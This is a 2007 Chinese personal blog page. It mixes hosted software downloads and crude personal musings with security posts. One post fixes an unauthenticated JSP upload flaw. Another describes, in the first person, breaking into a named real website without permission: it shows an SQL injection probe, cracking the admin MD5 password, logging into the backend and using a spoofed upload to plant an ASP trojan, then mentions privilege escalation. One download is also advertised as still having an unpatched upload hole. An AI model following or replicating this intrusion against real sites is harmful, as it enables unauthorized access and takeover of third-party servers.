[2006-12-15]欢迎光临Corbie's Blog。

[2006-12-15]新域名正式启动!

[2007-12-8]即日起,本站将提供一些有用的资源给大家下载,请点击此处进入下载！

安徽电信nod32升级服务器
服务器地址:http://eset.corbie.com.cn
本站重新开放注册,大家赶快下有用的资源....
nod32服务器升级即时信息统计系统地址:http://corbie.9966.org
客户端下载地址: http://www.corbie.com.cn/nod32.rar

|< < 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 > >|

预览模式: 普通 | 列表

puline JSP上传漏洞修复

作者:Corbie 日期:2007-12-14 12:48

漏洞地址:http://www.puline.com/manage/filesystem/upfile_iframe.jsp

漏洞说明:不经过验证直接得到上传地址,并支持各种格式上传.

attachments/200712/4980633911.jpg

解决方法:
在upfile_iframe.jsp head区加上以下代码

下载: head.jsp

<%@ include file="../include/config.jsp" %>
<%@ page session="true" %>
<%@ page import="java.sql.*" %>
<%@ page import="javax.servlet.*" %>
<%@ page import="javax.servlet.http.*" %>
<%@ page language="java" import="puline.*" %>
<%@ page import= "java.text.SimpleDateFormat"%>
<%@ page contentType="text/html;charset=gb2312" %>
<%
sysproedomclass sysadmin=new sysproedomclass();
if (!sysadmin.getlogined(session)) {
response.sendRedirect("../login.jsp");
}

标签: corbie,漏洞

类别: 技术教程 | 引用: 0 | 评论: 0 | 阅读: 191 | 打印 | 打包 | 转发

人才网程序

作者:Corbie 日期:2007-12-14 00:21

attachments/200712/6202079737.jpg
attachments/200712/4765705028.jpg

下载:

renc.rar

标签: corbie,人才网程序

类别: 资源共享 | 引用: 0 | 评论: 0 | 阅读: 173 | 打印 | 打包 | 转发

漂亮商城商业版

作者:Corbie 日期:2007-12-13 23:24

gouwu.rar (请登录后下载)

标签: corbie,漂亮商城商业版

类别: 资源共享 | 引用: 0 | 评论: 0 | 阅读: 181 | 打印 | 打包 | 转发

Jsp网站程序下载!

作者:Corbie 日期:2007-12-13 23:06

演示地址:www.puline.com
attachments/200712/4093195474.jpg

程序说明:Jsp+Mysql开发,程序价值5万,但后台存在上传漏洞,暂时没修补.本程序只提供Jsp代码部分,Mysql数据库以及java源代码不提供,仅供参考!

下载文件

ROOT.rar (请登录后下载)

标签: corbie,jsp,java,jsp代码

类别: 资源共享 | 引用: 0 | 评论: 0 | 阅读: 252 | 打印 | 打包 | 转发

岁月！

作者:Corbie 日期:2007-12-13 22:00

发表时间：2007年7月17日 15时29分56秒评论/阅读(6/30)

      仿佛记得二年前的今天,是飞陪我一起去学校拿毕业证...

      依稀记得和毕业证一起有个同学录,说白了就是联系方式,主要用于互相骚扰用的,二年后,里面的很多男人步入爹的行列,生男生女,养家糊口...

      二年前,飞陪我拿毕业证,那时候我们还在做SF,每天醉生梦死,幻想一天早上起来的时候被钱砸死,虽然我们没被钱砸死,但把SF给做死了,遗憾,遗憾...二年后,飞加入南下的行列,去了土匪,强盗,小偷,妓女成窝的国际化大都市---广州,步上了漂泊的生活,但我感觉他非常适合做鸭,因为拥有一切比鸭还要NB的资本,资本就是本钱,就是创造力,希望飞用他现有的身体资源,打造中国第一鸭,但小心艾滋...

     二年前,和兄弟小内一起做SF,梦想某天有一群服务器,跑上个上W的人,钞票花花的,现实是残酷的,分赃的问题,导致第一次合作失败,虽然合作失败,但臭味相投,感情源源流长...如黄河泛滥....还好本人非变态...不加描述了.

     二年前,环抱梦想的我也加入奔向流氓国际的广州,寻求自己的游戏梦,一个唯思的唯让我奋不顾身投入游戏圈,也是这个唯字让我离开游戏圈。二年后,和一帮兄弟在寻求自己的理想,努力进行中。

     二年前,和大草原合作倒卖服务器给他老板,如此这般,卖来卖去,还是卖到我这里,看样子,倒卖的生意还是非常有前途的,二年后,风云变换,合作做事。时世变换啊....

标签: corbie

类别: 心情故事 | 引用: 0 | 评论: 0 | 阅读: 149 | 打印 | 打包 | 转发

男人

作者:Corbie 日期:2007-12-13 21:53

       一个男人，前半生被父母照顾，后半生照顾父母儿子和妻子，就是一个标准男人的生活.多经典啊,先被别人养,在养别人,和做妓女差不多,嫖客养你,你养小白脸,所以我总结了下一个标准的男人需要有妓女的素质和涵养,在被养和养的问题上,要努力把握方向.

       换句话来说女人属于一直被养,一直被养和二奶差不多,总结下一个标准的女人需要有做二奶的潜质,看样子做女人是比男人安逸的多.

       男人的有效生命期应该在30岁,30岁后属于养人,通俗来说是苦力,肩负养家糊口的重担,更担负给老婆创造更多消费的能力以及教育子女成长的资本.

       所以标准的男人是个妓女,成功的男人是个苦力！

标签: corbie

类别: 心情故事 | 引用: 0 | 评论: 0 | 阅读: 153 | 打印 | 打包 | 转发

成功入侵Web Server: www.nowhelp.cn

作者:Corbie 日期:2007-12-13 21:29

以下是引用片段：

Web Server: www.nowhelp.cn

Soft:GoCom信息平台

2007年12月11日,15点14分。得到网站 "www.nowhelp.cn" 行动起来,分析一下该网站采用asp语言编写,2话不说先闲逛全站,寻找漏洞,寻找注入点,对可疑只处进行手动注入测试,("http://www.nowhelp.cn/xxxx.asp?pid=177 and 1=2") 测试多个均无收获,正在气馁之时,随便乱点几下,哈,运气不错, 尽然暴错,这正是我想要的结果

字符串的语法错误在查询表达式 'ProClassID=177' Order By IssueTime Desc' 中。

/xxxx.asp，行 22

哈,拿家伙,domain3.6 进一步注入, 如图片,

attachments/200712/0163676604.jpg

已猜出密码

密码不是明文,很明显已经通过md5加密,我们进行解密,如图

attachments/200712/9887630286.jpg

我们马上登陆后台,
attachments/200712/2407865530.jpg

试图上传自己的asp木马,恐怕让人失望了,上传文件已被限制,恐怕不能直接上传我们的asp木马,
只能通过其他方式了,
拿出我们的工具 WinSock Expert v0.6 beta1, 进行包分析

attachments/200712/1758794494.jpg

找到上传调用文件,
好,下一步进行欺骗上传,

HTTP/1.1 200 OK
Date: Tue, 11 Dec 2007 07:45:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1169
Content-Type: text/html
Cache-control: private

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body>
<SCRIPT language=javascript>
parent.HtmlEdit.focus();
var range = parent.HtmlEdit.document.selection.createRange();
range.pasteHTML('<img src=../../../UploadFiles/News/2007121115456578.gif>');
if(parent.parent.myform.UploadFiles.value==''){
parent.parent.myform.UploadFiles.value+='../../../UploadFiles/News/2007121115456578.gif';}
else{
parent.parent.myform.UploadFiles.value+='|'+'../../../UploadFiles/News/2007121115456578.gif';}
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script><SCRIPT language=javascript>
parent.HtmlEdit.focus();
var range = parent.HtmlEdit.document.selection.createRange();
range.text='[upload=sp ]../../../UploadFiles/News/2007121115456503.asp [/upload]';
if(parent.parent.myform.UploadFiles.value==''){
parent.parent.myform.UploadFiles.value+='../../../UploadFiles/News/2007121115456503.asp ';}
else{
parent.parent.myform.UploadFiles.value+='|'+'../../../UploadFiles/News/2007121115456503.asp ';}
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script>
</body>
</html>

attachments/200712/2434801233.jpg
哈,终于上完成

attachments/200712/1849943656.jpg

到了这步,剩下的就花点功夫进行权限提升吧,提权部分我就不多说了,如有问题可直接联系我,
在此声明,本入侵纯属友情检测,并无恶意,本人已把漏洞补好,请该网站管理员注意.

attachments/200712/6902159905.jpg